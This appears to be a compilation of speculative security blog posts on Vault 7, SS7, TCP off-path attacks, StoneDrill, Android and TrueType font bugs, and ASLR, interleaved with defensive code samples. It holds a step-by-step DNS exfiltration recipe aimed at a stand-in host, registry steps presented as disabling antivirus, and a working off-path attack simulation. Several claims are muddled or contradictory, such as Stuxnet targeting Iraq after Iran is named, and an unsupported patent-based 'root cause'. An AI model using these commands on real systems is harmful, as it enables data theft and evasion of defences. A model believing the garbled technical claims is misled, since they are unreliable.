The interesting thing is that the jailbreak techniques cover smart TV models deployed in the hospitality industry. It makes sense to me that jailbreaking a personal TV might serve a personal interest in enjoying more benefits, although it is certainly unsafe. However, for an enterprise hospitality group it is not possible to roll out an illegal feature, since an enterprise firm is not going to take the risk. So what is the goal of this jailbreak tool?

In this discussion I am not going to discuss the source code I found, since this is a hot topic and you can find the information anywhere. To make it easy to find the related information, please visit the URL below:

https://wikileaks.org/ciav7p1/cms/page_12353643.html

Recommendation:

It is a good idea to check the brand of the smart TV installed in your hotel room after check-in. Maybe you will enjoy your business or travel trip more, right?

The culprit of the CIA's global covert hacking program comes from the SS7 design limitation

Today's headline news provides a second reminder to the world that we are under surveillance, since our hero Edward Snowden alerted the world earlier. As a result, he may carry a charge of treason. To be honest, I am a little worried about him. The fact is that the expectations of the President of the United States have changed. Good luck to him! If God is present, please give your son Edward assistance. He really needs your help!

We are not going to discuss the total of 8,761 documents posted on WikiLeaks here; just know that this is the first full part of the series dubbed Year Zero. However, we would like to bring your attention to a weakness of the telecom industry today, which we believe is the root cause, or you could say a backdoor, in the telecommunications world. OK, this time we all emulate Sherlock Holmes. Let's start.

Speculation

  1. Flaw found in an ASN.1 compiler

Abstract Syntax Notation 1 (ASN.1) background:

Quick and dirty description:

In the field of telecommunications and computer networks, ASN.1 (Abstract Syntax Notation One) is a set of standards describing a flexible notation for data representation, encoding, transmission and decoding. It provides formal, unambiguous and precise rules to describe object structure independently of specific computer hardware. ASN.1 gives application and protocol developers a high-level tool, essentially a data-definition language, for defining protocol syntax and the information that an application exchanges between systems.

Vulnerability:

A flaw discovered in an ASN.1 compiler, a widely used C/C++ development tool, could have propagated code vulnerable to heap memory corruption attacks, resulting in remote code execution.

Heap memory corruption attacks

A traditional memory corruption exploit can be achieved by pointing execution to injected code on the stack or heap where the data resides.

Technical information: vulnerability details

Vulnerability Note VU#790839: Objective Systems ASN1C generates code that contains a heap overflow vulnerability. For more details, please refer to the URL below.

https://www.kb.cert.org/vuls/id/790839

Afterwards, a government agency can rely on this design weakness of SS7 to track the movements of a mobile phone user anywhere in the world. From a technical point of view, the compromise of WhatsApp or Telegram was not a direct attack on the application; sometimes there is no need to install malware on the client's mobile phone. It is exactly the abuse of SS7 weaknesses.

2. TCP/IPv4 off-path attack on the Linux stack (CVE-2016-5696)

The difficult part for a hacker taking over a TCP connection is guessing the client's source port and the current sequence number. A group of researchers found that the attacker can open a connection to the server and, from its own address, send as many RST packets with the wrong sequence number as possible, mixed with a few spoofed packets. By counting how many challenge ACK packets get returned to the attacker's side, and knowing the rate limit, the attacker can infer how many of the spoofed packets resulted in a challenge ACK to the spoofed client, and thus how many of the guesses were correct. This way the attacker can quickly narrow down which port and sequence values are correct.
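The counting trick above can be simulated end to end. Below is an added example (mine, not the researchers' code or the original post's) that models the unpatched server's single per-second challenge-ACK budget and the RFC 5961 rules, and an off-path attacker who spends that budget on its own connection to see whether a spoofed probe consumed one. Addresses, ports, sequence numbers and the small sequence range searched are constructed for the demo:

```python
"""Off-path inference through the global challenge-ACK rate limit (CVE-2016-5696).

Added example, not code from the researchers' paper or the original post. It
is a simulation: Server applies the RFC 5961 rules (a SYN on an established
connection or an in-window RST draws a challenge ACK; an RST whose sequence
number hits rcv_nxt exactly resets the connection) with one global counter
of challenge ACKs per second, as the unpatched Linux stack did. The attacker
owns one connection to the server and spends each second's budget of
challenge ACKs on that connection; a missing reply means a spoofed probe
consumed one. The addresses, ports, sequence numbers and the small sequence
range searched are constructed for the demo.
"""


class Server:
    def __init__(self, limit=100):
        self.limit = limit          # tcp_challenge_ack_limit (global, per second)
        self.used = 0               # challenge ACKs sent this second
        self.connections = {}       # (client_ip, client_port) -> [rcv_nxt, window]

    def add_connection(self, ip, port, rcv_nxt, window=65535):
        self.connections[(ip, port)] = [rcv_nxt, window]

    def new_second(self):
        self.used = 0

    def _challenge_ack(self):
        if self.used < self.limit:
            self.used += 1
            return "challenge_ack"
        return "dropped"            # budget exhausted: silently dropped

    def receive(self, src_ip, src_port, flags, seq):
        """Return what the server sends back toward src_ip. The attacker only
        ever sees the replies addressed to its own connection."""
        conn = self.connections.get((src_ip, src_port))
        if conn is None:
            return "rst"            # no such connection: plain RST, no budget used
        rcv_nxt, window = conn
        if flags == "SYN":
            return self._challenge_ack()
        if flags == "RST":
            if seq == rcv_nxt:
                del self.connections[(src_ip, src_port)]
                return "connection_reset"
            if rcv_nxt < seq < rcv_nxt + window:
                return self._challenge_ack()
        return "dropped"


class Attacker:
    def __init__(self, server, ip="203.0.113.5", port=50000):
        self.server, self.ip, self.port = server, ip, port
        self.rcv_nxt = 1000         # server-side rcv_nxt of the attacker's own connection
        server.add_connection(ip, port, self.rcv_nxt)

    def probe(self, victim_ip, victim_port, flags="SYN", seq=0):
        """Send one spoofed packet, then drain the second's challenge-ACK budget
        on our own connection; return how many ACKs the spoof consumed (0 or 1)."""
        self.server.new_second()
        self.server.receive(victim_ip, victim_port, flags, seq)   # reply goes to the victim
        seen = sum(
            self.server.receive(self.ip, self.port, "RST", self.rcv_nxt + 1) == "challenge_ack"
            for _ in range(self.server.limit))
        return self.server.limit - seen

    def find_port(self, victim_ip, candidate_ports):
        """Ports for which a spoofed SYN drew a challenge ACK, i.e. a live connection."""
        return [p for p in candidate_ports if self.probe(victim_ip, p, "SYN") == 1]

    def find_window(self, victim_ip, victim_port, seq_range, window=65535):
        """Step through seq_range in window-sized strides; the stride that
        draws a challenge ACK lies inside the victim's receive window."""
        for guess in range(seq_range[0], seq_range[1], window):
            if self.probe(victim_ip, victim_port, "RST", guess) == 1:
                return guess
        return None


def run_demo():
    server = Server(limit=100)
    # Constructed victim connection the attacker wants to hijack.
    victim_ip, victim_port, victim_seq = "198.51.100.20", 40321, 703710
    server.add_connection(victim_ip, victim_port, victim_seq)
    attacker = Attacker(server)
    ports = attacker.find_port(victim_ip, range(40300, 40400))
    seq = attacker.find_window(victim_ip, ports[0], (0, 1 << 20)) if ports else None
    return ports, seq


if __name__ == "__main__":
    print(run_demo())   # ([40321], 720885)
```

Each probe costs one spoofed packet plus a burst of 100 RSTs, so a port is found in at most one probe per candidate and the receive window in one probe per window-sized stride (a real 32-bit sequence space needs about 65,536 strides; the example searches a small assumed range). The Linux fix in 4.7 raised the default limit and randomises it every second, which is what removes the information from the count.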


3. Law enforcement backdoor software overview

Edward Snowden disclosed the global surveillance program in 2013, and we are all alert that surveillance programs are flooding the whole world. What brings this to a tech guy's attention is more or less the sniffing technique. How did the US government collect personal data and telephone calls from our desktop and mobile phone devices? Tech guys interested in cyber security may know that a few hacker groups assist the law enforcement sector in developing monitoring agent software. The brand names include DaVinci, Morcut, Crisis and Flosax. The most famous product looks to be DaVinci, an Italian-made surveillance software that performs a lot of actions, such as hidden file transfers, screen capturing, keystroke logging and process injection.

An interesting story happened in July 2015

A cyber-surveillance company believes a government may have been behind a massive hack of its systems that saw huge chunks of its code stolen. For more details, please refer to the URL below:

http://eandt.theiet.org/news/2015/jul/hacking-team-breach.cfm

After you read this article, you may have questions. Since 2015, data breach incidents have happened frequently. It is hard to believe how weak the cyber defence setups in the world are. No matter how many defence facilities you build in your firm, there seems to be no appropriate solution to fight cyber crime. Do you think all the incidents that happened in 2015 and 2016 are related to the hacker code exposed in July 2015?

Reference:

Law enforcement surveillance software technical features:

Available surveillance modules
Accessed files
Address Book
Applications used
Calendar
Contacts
Device Type
Files Accessed
Keylogging
Saved Passwords
Mouse Activity (intended to defeat virtual keyboards)
Record Calls and call data
Screenshots
Take Photographs with webcam
Record Chats
Copy Clipboard
Record Audio from Microphone
With additional Voice and silence detection to conserve space
Realtime audio surveillance (“live mic:” module is only available for Windows Mobile)
Device Position
URLs Visited
Create conference calls (with a silent 3rd party)
Infect other devices (deprecated since v. 8.4)

Suggestion to reader:

Since the world situation has become more complex today, in politics as well as in people's livelihood, here is a solution that lets you easily check your mobile phone's status. Are you under a government surveillance program?

If you are an Android phone user, go to the Play Store and download a free program named SnoopSnitch. SnoopSnitch can warn you when certain SS7 attacks occur against your phone and can detect when someone is snooping on it.

Bye!

Imagination – phantom DNS-query commands activating the StoneDrill attack in Saudi Arabia

Patrick Jane is a fictional character and the protagonist of the CBS crime drama The Mentalist; Jane is an independent consultant. It sounds like what you and I can be in the cyber world. Ha ha. The most interesting cyber security topic of the past two days is the destructive malware dubbed StoneDrill. The incident happened at the end of last year (2016), but the news was only exposed to the world a few days ago. The famous antivirus vendor Kaspersky Lab analysed all the incident details and provides the detective control to the world. In our view, all the information can be researched on the internet, but the difficult part is the infection technique used in this incident. I believe security experts like Kaspersky Lab and FireEye know more, but it cannot be released to the public. Since we are in a discussion forum, there is no harm in becoming an actor for a moment. OK, my friends, we are now Patrick Jane. Let's start the journey.

Shamoon 2.0 and StoneDrill background:

Shamoon 2.0 and StoneDrill were developed by different hacker groups. The fingerprints (keyboard layout and language ID) found in the malware source code look like proof of identity. In Shamoon 2.0 a Yemeni language set was found (ID 9217, i.e. Arabic - Yemen [ar] (ar-ye)), whereas StoneDrill mostly embeds Persian resource language.

Common attack target criteria:

Platform: most likely machines running a Microsoft Windows OS.

Victim: Targeting oil and gas companies in the Middle East and also aiming towards targets in Europe, Kaspersky said.

Imagination – how the malware fooled the oil and gas companies' defence mechanisms.

We assume that both oil and gas companies install antivirus programs, malware detectors and endpoint content filtering (Websense and Bluecoat). So how did the attacker manage to implant malware on the hosts?

Hint 1:

PowerShell activities were found (Shamoon 2)

Hint 2:

Since PowerShell usage on the Windows platform is common today, PowerShell looks like an accomplice. There are many ways to avoid detection.

Methodology A:

PowerShell commands received via DNS queries. A unique attack called DNSMessenger uses DNS queries to carry out malicious PowerShell commands on compromised computers. It functions like a RAT. This

File transfer via DNS

1. Convert the file to be transferred into a hex stream with xxd.
Command - (xxd -p secret > file.hex)

2. Read each line from file.hex and "transmit" it as a DNS query.
Command - (for b in `cat file.hex`; do dig $b.shell.evilexample.com; done)

3. On the DNS server, capture the messages with tcpdump or the query log.
Command - (tcpdump -w /tmp/dns -s0 port 53 and host system.example.com)

4. Extract the messages from the packet capture (the name is field 9 of tcpdump's output because dig adds an EDNS "[1au]" field).
Command - (tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt)

5. Reverse the hex encoding.
Command: (xxd -r -p < received.txt > keys.pgp)

Done. Hey man, file transfer via DNS, you are done!
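From the defender's side, the five steps above leave a distinctive trace in a resolver's query log: a burst of queries whose leftmost label is a long run of hex digits, all under one zone. The C program below is an added example written for this post, not code from the original article or from any DNSMessenger analysis. It scans constructed BIND-style query-log lines (the sample values are invented here) and flags queries of that shape for a zone you pass in. The log format, the 16-character minimum label length and the zone names are assumptions of the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample lines in BIND-style query-log format (not a real capture). */
static const char *const SAMPLE_LOG[] = {
    "client 10.0.0.5#53211: query: 2d2d2d2d2d424547494e2050475020.shell.evilexample.com IN A",
    "client 10.0.0.5#53211: query: www.example.com IN A",
    "client 10.0.0.5#53211: query: 4d4553534147452d2d2d2d2d0a6c51.shell.evilexample.com IN A",
    "client 10.0.0.7#40012: query: mail.example.com IN MX",
    "client 10.0.0.5#53211: query: 45434d6f5a614e3352365a4d6a4c32.shell.evilexample.com IN A",
    "client 10.0.0.9#51000: query: deadbeef.example.org IN A", /* short hex label: normal */
};
#define SAMPLE_LOG_LEN ((int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]))

/* Heuristic threshold (assumed): xxd -p emits 60 hex chars per line, while
 * legitimate hex-looking labels (hashes in CDN names, etc.) are usually short. */
#define MIN_HEX_LABEL 16

/* 1 if every character of s[0..len) is a hex digit, 0 otherwise. */
static int is_hex_label(const char *s, size_t len) {
    if (len == 0) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isxdigit((unsigned char)s[i])) return 0;
    return 1;
}

/* Returns 1 when the log line queries a name under `zone` whose leftmost label
 * is a long run of hex digits, the shape the xxd -p / dig loop produces. */
int query_looks_like_tunnel(const char *line, const char *zone) {
    const char *q = strstr(line, "query: ");
    if (q == NULL) return 0;
    q += strlen("query: ");
    size_t namelen = strcspn(q, " ");     /* queried name ends at the next space */
    size_t zonelen = strlen(zone);
    if (namelen <= zonelen + 1) return 0;  /* too short to be "<label>." + zone */
    /* The name must end with "." followed by the zone. */
    if (q[namelen - zonelen - 1] != '.' ||
        strncmp(q + namelen - zonelen, zone, zonelen) != 0)
        return 0;
    size_t firstlabel = strcspn(q, ".");
    if (firstlabel < MIN_HEX_LABEL) return 0;
    return is_hex_label(q, firstlabel);
}

/* Counts matching lines; a per-client, per-window version of this count is
 * what an alert rule would threshold on. */
int count_tunnel_queries(const char *const *lines, int n, const char *zone) {
    int hits = 0;
    for (int i = 0; i < n; i++)
        hits += query_looks_like_tunnel(lines[i], zone);
    return hits;
}

/* Convenience wrapper over the constructed sample log. */
int sample_tunnel_count(void) {
    return count_tunnel_queries(SAMPLE_LOG, SAMPLE_LOG_LEN, "shell.evilexample.com");
}

int main(void) {
    printf("suspicious hex-label queries under shell.evilexample.com: %d of %d lines\n",
           sample_tunnel_count(), SAMPLE_LOG_LEN);
    return 0;
}
```

The heuristic is deliberately narrow. In a real deployment you would also count distinct labels per client and per zone over a time window: a single hex-looking label (the deadbeef line) is normal, while dozens from one client within a few seconds, each one different, is the signature of a file being pushed out one line at a time.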


Methodology B:

Disable Anti-Virus via Debugger Setting

1. Run regedit.exe
2. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
3. Create a new key (example: calc.exe)
4. Create a new string value under your exe key. The name of the string value is 'Debugger', and the value is svchost.exe (or anything)


It seems our Patrick Jane life stops here! Ha ha, interesting, right? It looks as if more techniques can be used today to fool defence mechanisms. As said, this is only my imagination; it is a concept, a virtual scenario replayed to find the possible ways this malware incident happened. OK, see you!

Heard that the Android operating system is not secure anymore? Probably it is not.

Android phone users make up a large share of the mobile phone market. We understand that there are no hack-proof devices in the world; even iPhone iOS before 10.2.1 is vulnerable to a DoS / code execution overflow (CVE-2017-2370). As Android users we are not surprised by an Android operating system bug. There are 2 critical bugs in mediaserver and SurfaceFlinger. A bug found in 2014 identified a potential memory leak in SurfaceFlinger on Android 4.4.4. A memory leak is due to an incompletely designed or programmed application that fails to free memory segments when they are no longer needed. Since this is a design fault (bug), as time went by the bug became a vulnerability, found by security experts last month. The CVE warns that an attacker is able to use a specially crafted file to cause memory corruption during media file and data processing on Android 7.0. Apart from that, a new vulnerability was found in mediaserver; it also affects the libhevc library. As far as we know, to improve device security on Android 7.0, Android breaks up the monolithic mediaserver process into multiple processes with permissions and capabilities restricted to only those required by each process. However, a design weakness causes a vulnerability located in the function that creates the native handle. When passing well-structured numFds and numInts (such as numFds = 0xffffffff, numInts = 2) to native_handle_create, you can cause an integer overflow in the expression "sizeof(native_handle_t) + sizeof(int) * (numFds + numInts)".

The code below is a proof of concept showing that each GraphicBuffer object contains a pointer to a native handle.

#include <stdlib.h>
#include <cutils/native_handle.h>   /* native_handle_t: version, numFds, numInts, data[] */

/* Vulnerable version as quoted on the page: both counts are trusted as given. */
native_handle_t* native_handle_create(int numFds, int numInts)
{
    native_handle_t* h = malloc(
        sizeof(native_handle_t) + sizeof(int)*(numFds+numInts)); //---------> Integer overflow position: numFds + numInts wraps (0xffffffff + 2 = 1)

    h->version = sizeof(native_handle_t);
    h->numFds = numFds;    /* stored unchanged, so the header claims far more entries than were allocated */
    h->numInts = numInts;
    return h;
}
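As an added example (not part of the original post, nor of the AOSP code it quotes), here is a hardened counterpart to the function above: it validates both counts before computing the allocation size, and a small model function shows the size the unchecked expression produces for the numFds = 0xffffffff, numInts = 2 case from the text. The struct is a stand-in with the same three-int header, and the caps MAX_NATIVE_FDS / MAX_NATIVE_INTS are values chosen for this example, not Android's.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Stand-in for Android's native_handle_t with the same three-int header
 * (assumed layout for this example; the real definition lives in cutils). */
typedef struct {
    int version;   /* sizeof(native_handle_t) */
    int numFds;    /* number of file descriptors at the start of data[] */
    int numInts;   /* number of ints that follow the fds in data[] */
    int data[];    /* numFds + numInts ints */
} native_handle_t;

/* Caps are an assumption of this example, chosen so the sum can never wrap
 * and so one handle cannot reserve an absurd allocation. */
#define MAX_NATIVE_FDS  1024
#define MAX_NATIVE_INTS 1024

/* Size the unchecked original requests. With numFds = -1 (0xffffffff) and
 * numInts = 2 the int sum wraps to 1, so only header + 4 bytes are allocated
 * while the header still records the huge numFds. */
size_t unchecked_handle_size(int numFds, int numInts) {
    uint32_t sum = (uint32_t)numFds + (uint32_t)numInts;  /* same bits as the int wrap */
    return sizeof(native_handle_t) + sizeof(int) * (size_t)sum;
}

/* Returns the allocation size for valid counts, or 0 when a count is negative,
 * above its cap, or the multiplication would overflow size_t. 0 is never a
 * valid size because the header alone is non-zero. */
size_t checked_handle_size(int numFds, int numInts) {
    if (numFds < 0 || numInts < 0) return 0;
    if (numFds > MAX_NATIVE_FDS || numInts > MAX_NATIVE_INTS) return 0;
    size_t n = (size_t)numFds + (size_t)numInts;  /* both capped: cannot wrap */
    /* Redundant with the caps, kept so the check stays correct if they are raised. */
    if (n > (SIZE_MAX - sizeof(native_handle_t)) / sizeof(int)) return 0;
    return sizeof(native_handle_t) + sizeof(int) * n;
}

/* Hardened allocator: rejects bad counts before malloc() instead of trusting the caller. */
native_handle_t *native_handle_create_checked(int numFds, int numInts) {
    size_t size = checked_handle_size(numFds, numInts);
    if (size == 0) return NULL;
    native_handle_t *h = malloc(size);
    if (h == NULL) return NULL;
    h->version = (int)sizeof(native_handle_t);
    h->numFds = numFds;
    h->numInts = numInts;
    return h;
}

/* Allocates, verifies the header, frees; 1 on success, 0 if the counts were rejected. */
int handle_roundtrip_ok(int numFds, int numInts) {
    native_handle_t *h = native_handle_create_checked(numFds, numInts);
    if (h == NULL) return 0;
    int ok = h->version == (int)sizeof(native_handle_t)
          && h->numFds == numFds && h->numInts == numInts;
    free(h);
    return ok;
}

int main(void) {
    printf("unchecked size for (0xffffffff, 2): %zu bytes\n", unchecked_handle_size(-1, 2));
    printf("checked size for (0xffffffff, 2):   %zu (0 = rejected)\n", checked_handle_size(-1, 2));
    printf("checked size for (2, 3):            %zu bytes\n", checked_handle_size(2, 3));
    return 0;
}
```

The point of the model function is the mismatch, not the arithmetic itself: the unchecked version hands back a 16-byte buffer whose header says 0xffffffff descriptors follow, and every consumer that walks data[] by numFds then reads or writes far past the allocation. Validating the counts at the one place they enter the struct closes that for every consumer at once.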

For details about these vulnerabilities on Android, please refer to the URL below.

https://source.android.com/security/bulletin/2017-02-01.html

We heard the overall comment that Android phones are not secure any more. As a matter of fact, design faults and design limitations are elements of that result. No perfect product has been made in the world; even putting more time into the development and staging phases cannot prevent a design fault occurring in your product. Yes, agreed, shortening the development life cycle makes design faults appear more frequently. Modern mobile phones integrate many applications and functions, and sometimes a 3rd-party application is integrated into your phone. Thus Android 7 contains defence mechanisms to protect the memory space and the kernel environment. But what is the fact that causes the operating system to still be vulnerable? OK, let's go together on this journey to elaborate more technical details in this regard.

The evolution of Android 7.0

Android 7.0 includes a variety of system and API behavior changes.

Battery and Memory
Background Optimizations
Permissions Changes
Sharing Files Between Apps
Accessibility Improvements
NDK Apps Linking to Platform Libraries
Check if your app uses private libraries
TLS/SSL Default Configuration Changes

Looking at the feature enhancements above, the improvements in the new version of Android look fine. As said, no perfect product design exists in the world. Thinking the other way around: what if we became a hacker? Among the items above, which part would become a vulnerability or weakness that lets an attacker compromise the phone?

Observational standpoint:

Point 1: (Sharing Files Between Apps)

Regarding the technical details written in the technical documentation: for apps targeting Android 7.0, the Android framework enforces the StrictMode API policy that prohibits exposing file:// URIs outside your app. If an intent containing a file URI leaves your app, the app fails with a FileUriExposedException exception. To share files between applications, you should send a content:// URI and grant a temporary access permission on the URI. The easiest way to grant this permission is by using the FileProvider class.

Side effect of Point 1 – Hackers can make use of the FileProvider class feature to try to dig out the mobile phone's data. The easy way is to embed a malicious script in a 3rd-party application and fool the user into clicking the button (accept sharing files between apps) during software installation. Many mobile phone users are smart today, but many people still fall into this trap.

Point 2: (Memory)

Although both the Android Runtime (ART) and the Dalvik virtual machine perform routine garbage collection, this does not mean you can ignore when and where your app allocates and releases memory. Software designers need to avoid introducing memory leaks, usually caused by holding onto object references in static member variables, and release any Reference objects at the appropriate time as defined by lifecycle callbacks.

Side effect of Point 2 – The easiest way to leak an Activity is by defining a static variable inside the class definition of the Activity and then setting it to the running instance of that Activity. If this reference is not cleared before the Activity's lifecycle completes, the Activity is leaked. So it all depends on the mobile app developer's design; it is hard to avoid memory leaks. As you know, what is the defect of a memory leak? Hackers can rely on this error to implant malware.

Point 3: (Background Optimizations)

ART (Android run-time)

Starting with Android 5.0, Android Runtime (ART) replaces Dalvik as the default virtual machine in the system.

Reference: The Dalvik Virtual Machine (Dalvik VM)

The Android platform leverages the Dalvik Virtual Machine (Dalvik VM) for memory, security, device and process management. Application designers can think of the Dalvik VM as a box that provides the necessary environment to execute an Android application, so they need not worry about the target device (mobile phone system).

Side effect of Point 3 – ART became the default runtime. While Dalvik relies on interpretation and just-in-time compilation, ART precompiles the app's Dalvik bytecode into native code. The command responsible for compiling an application into OAT is dex2oat, which can be found at /system/bin/dex2oat. All mobile apps are compiled every time the device's system is upgraded, or the first time it boots after purchase. So an attacker might have a way to use dex2oat to generate OAT files from modified versions of installed apps or system frameworks and replace the original OAT files with them. This is the famous attack hiding behind the Android Runtime. Yes, this compile method sounds like a jailbreak of the mobile device, and even the iPhone cannot avoid that. Therefore I still believe Android security is not so poor, because no product on the market can claim to be hack-proof.

Remark: Did you hear that hackers prepare scam emails luring users to upgrade their Android phones? It is a similar case, and it brings the same concern.

Reference: Critical vulnerabilities on iPhone and Android found in Feb 2017.

Apple » iPhone iOS
CVE ID | Score | Type | Publish Date | Update Date
CVE-2017-2370 | 9.3 | DoS Exec Code Overflow | 2017-02-20 | 2017-02-22
CVE-2017-2360 | 9.3 | DoS Exec Code | 2017-02-20 | 2017-02-22

Android OS
CVE ID | Score | Type | Publish Date | Update Date
CVE-2017-0405 | 9.3 | Remote code execution vulnerability in SurfaceFlinger | Feb 2017 | Feb 2017
CVE-2017-0406, CVE-2017-0407 | 9.3 | Remote code execution vulnerability in Mediaserver | Feb 2017 | Feb 2017

Summary:

If people tell you that a new mobile device is excellent, with fewer vulnerabilities found and a perfect design: even if it is the best at this moment, believe that it is hard to maintain that glory in the long run, because of today's on-demand business strategy. If you heard that the Android operating system is not secure anymore, probably it is not.

Truetype font + code = fileless malware

Security service providers alert the IT world that malware might infiltrate their infrastructure facilities, yet their cyber defence mechanisms look asleep. Strange? Over 140 enterprises in 40 countries were affected. Fileless or invisible cyber attacks are commonly of three types: memory resident, rootkits and Windows registry. According to the anti-virus experts' interpretation, it evades detection by reducing or eliminating the storage of any binaries on disk and instead hides its code in the registry of a compromised host; the naming convention is based on these criteria. Can you still remember the W32.Duqu malware? It is a descendant of Stuxnet. We all know Stuxnet is the famous malware responsible for causing substantial damage to Iran's nuclear program, identified in 2010. According to the technical articles, the Stuxnet and W32.Duqu specifications are equivalent to a fileless malware algorithm. Coincidentally, fileless malware targets the Windows OS. But what this matter brings to our attention is the infection medium. Nowadays enterprises install advanced cyber defence facilities. The detective control can effectively quarantine malicious network activity once an infected device goes to download the payload file. Nearly 99% of such malware downloads are executable files, and therefore malware detectors have no difficulty with this direct-approach attack today.

According to the analysis report, W32.Duqu makes use of a TrueType font as the infection medium. The first time I heard of this infection technique it surprised me. We understand now that a TrueType font can contain malware that directly exploits vulnerabilities in the Windows kernel. The attack method was a crafted TrueType Font (TTF) file; such a TTF file allowed the malware to escape the user-mode sandboxed environment implemented by the Microsoft Word process and compromise the host. Nobody else discovered more details of CVE-2011-3402 until an exploit kit opened the secret in Oct 2012.

Security experts found that win32k.sys is truly the instigator. They dug out that Microsoft products are most likely the major target of such attacks. From a logical point of view, Microsoft's user coverage is the largest in the world, and the objective of the Stuxnet malware outbreak targeted Microsoft operating system workstations at Iraq's nuclear facilities. The security experts point out the design weakness of win32k.sys. Details are shown below:

  • Windows executes TrueType font programs
  • Rendering bitmaps
  • Win32k operates in the kernel area (Ring 0)

Remark: A kernel-mode object database (part of win32k.sys) that marshals commands from the application to the composition engine.

As time goes by,  Google Project Zero summarizes all the details and related information.

https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html

https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html

https://googleprojectzero.blogspot.de/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html

Vulnerabilities related to win32k.sys and TrueType fonts look like a never-ending story. See the breakdown list below for reference.

Remark: TrueType fonts (made by Microsoft) live in your windows fonts folder.

The BLEND vulnerability (CVE-2015-0093, CVE-2015-3052)

Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

  • CVE-2016-3029 confirms a vulnerability that allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka "TrueType Font Parsing Information Disclosure Vulnerability." ASLR (address space layout randomization) is a major protection feature on virtual machines, especially VMware. In that sense this particular vulnerability is like a flood: it now affects virtual machine environments.
  • TrueType Font Parsing Elevation of Privilege Vulnerability – CVE-2016-7182. The vulnerability is in the cjComputeGLYPHSET_MSFT_GENERAL function of the win32k.sys system module. This is a design limitation due to improper processing of crafted TrueType fonts (TTF); the vulnerability is due to improper handling of objects within memory.

We have analysed tons of documents on TrueType font (TTF) vulnerabilities so far. Maybe you have questions: what is the overall impact of TTF vulnerabilities today? Have all the vulnerabilities been fixed? We are all in virtual machine environments; is there any impact on virtual machines once a single VM compartment is compromised?

  1. What is the overall impact of TTF vulnerabilities today?

It looks as if the TrueType font design limitation, combined with the graphics display mechanism on computer hardware, causes never-ending vulnerabilities. See the graphics state summary table below; it shows that an auto-flip mechanism is applied to the graphics state variables.

You can easily find hints in the 2 statements below about exploiting the memory design. Security experts (FireEye) believe this is one of the root causes.
The graphics controller as claimed in claim 7, wherein said auto-flip mechanism comprises:
  • a bank of shift registers arranged to synchronize the video capture parameters from video capture engine and temporarily store those parameters; and
  • a control block arranged to control proper “flipping” events based on the sequence of input video capture parameters from the video capture engine registered in the shift registers, said control block comprising a Truth Table for maintaining predetermined display setting values for different auto-flip operations based on the sequence of the video capture parameters from the video capture engine and overlay control signals from the video overlay engine.

It looks as if the issues above are a fundamental problem of the hardware display architecture: the temporary store memory addresses have no bounds checking, and therefore malware can make use of this vulnerability. So the impact of TTF (TrueType font) vulnerabilities is still inherent today.

2. Have all the vulnerabilities been fixed?

Referring to the information above, it is hard to draw a conclusion today!

3. We are all in virtual machine environments. Is there any impact on virtual machines once a single VM compartment is compromised?

CVE-2016-3029 confirms a vulnerability that allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka "TrueType Font Parsing Information Disclosure Vulnerability." ASLR (address space layout randomization) is a major protection feature on virtual machines, especially VMware. In that sense this particular vulnerability is like a flood: it now affects virtual machine environments.

Predictions:

I strongly believe that hackers or government enforcement teams will rely on these vulnerabilities to develop different malware to satisfy their objectives. Stay tuned!

Comments:

Some tests I have not completed yet. If you are interested in this topic, you can drill down a little more. Related hints may be found in the Visual Studio documents, as shown below:

According to the Visual Studio documentation, the ushort keyword indicates an integral data type that stores values according to the size and range 0 to 65,535 ……….

He is a great partner of the virtual machine, but he can kill the VM at the same time – address space layout randomization

The trend in the IT world nowadays is running into the virtual world; even your mobile phone's operating system runs on top of a virtual machine. Memory resource utilisation has gone from traditionally static to dynamic since the virtual machine architecture was founded. Security experts worry about infiltration of malware into virtual machines. A mitigation step was introduced in VMware in 2014: the system designers adopted a technology called address space layout randomization. As a result it prevents malware from implanting itself in the kernel, since there is no fixed living place for the malware (see below – a statement from a technical article pointing out how ASLR brings value).

The VMware ESXi kernel uses an address space layout randomization (ASLR) methodology to provide random and unpredictable addresses for user-mode applications, drivers, libraries and other executable components. This is a significant security benefit because of the way ASLR thwarts malware looking to take advantage of memory-based exploits. The malware would not have a known address to use as a vector for the exploit because of the randomization.

As time goes by, ASLR is no longer only the assistant of the virtual machine designer; on the other hand, he can become a killer of his master. But this fact is not news today. According to experimental studies by technology experts, it is possible to execute an attack on the kernel side through a malicious Java application. The method is a kind of side-channel attack, based on the indirect addresses that the processor's memory management unit (MMU) touched previously while traversing the page tables to translate virtual memory addresses into physical memory addresses. Since the CPU cache is shared, and MMU activity is recognised there like that of an active application, evaluating differences in data access time before and after resetting the cache (the attack variety "EVICT + TIME") lets one pick out, with high probability, the addresses and locations being operated on by the memory management unit.

By breaking ASLR, an attacker knows where code executes and can prepare an attack that targets the same area of memory, stealing sensitive information stored in the computer's memory.

The vulnerability channel found in web browsers was announced by a Professor of Computer Science at Cornell Tech in Jan 2016.

When attacking browsers, one may be able to insert arbitrary objects into the victim's heap. Let's focus on the fundamentals of web browser design.

Web applications communicate with each other through system calls to the browser kernel. As we know, web applications exist in separate processes owned by the browser kernel; they are prohibited from communicating with each other except through the browser kernel.
However, plugins are less reliable than browsers.

As a matter of fact, JavaScript is the helper of the ASLR vulnerability; it sounds like JavaScript is an accomplice. The murderer is the plug-in application.

But in which situation will a virtual machine be compromised through this vulnerability?

From a technical point of view, when a hacker engages in a cyber attack targeting the memory area of the workplace, we understand that it is a malware-style attack. As we know, the AMD architecture defines a feature named the SVM instruction set. AMD virtualization technology, codenamed "Pacifica", introduces several new instructions and modifies several existing instructions to facilitate the implementation of VMM systems.
The SVM instruction set includes instructions to:

Start execution of a guest (VMRUN)
Save and restore subsets of processor state (VMSAVE,VMLOAD)
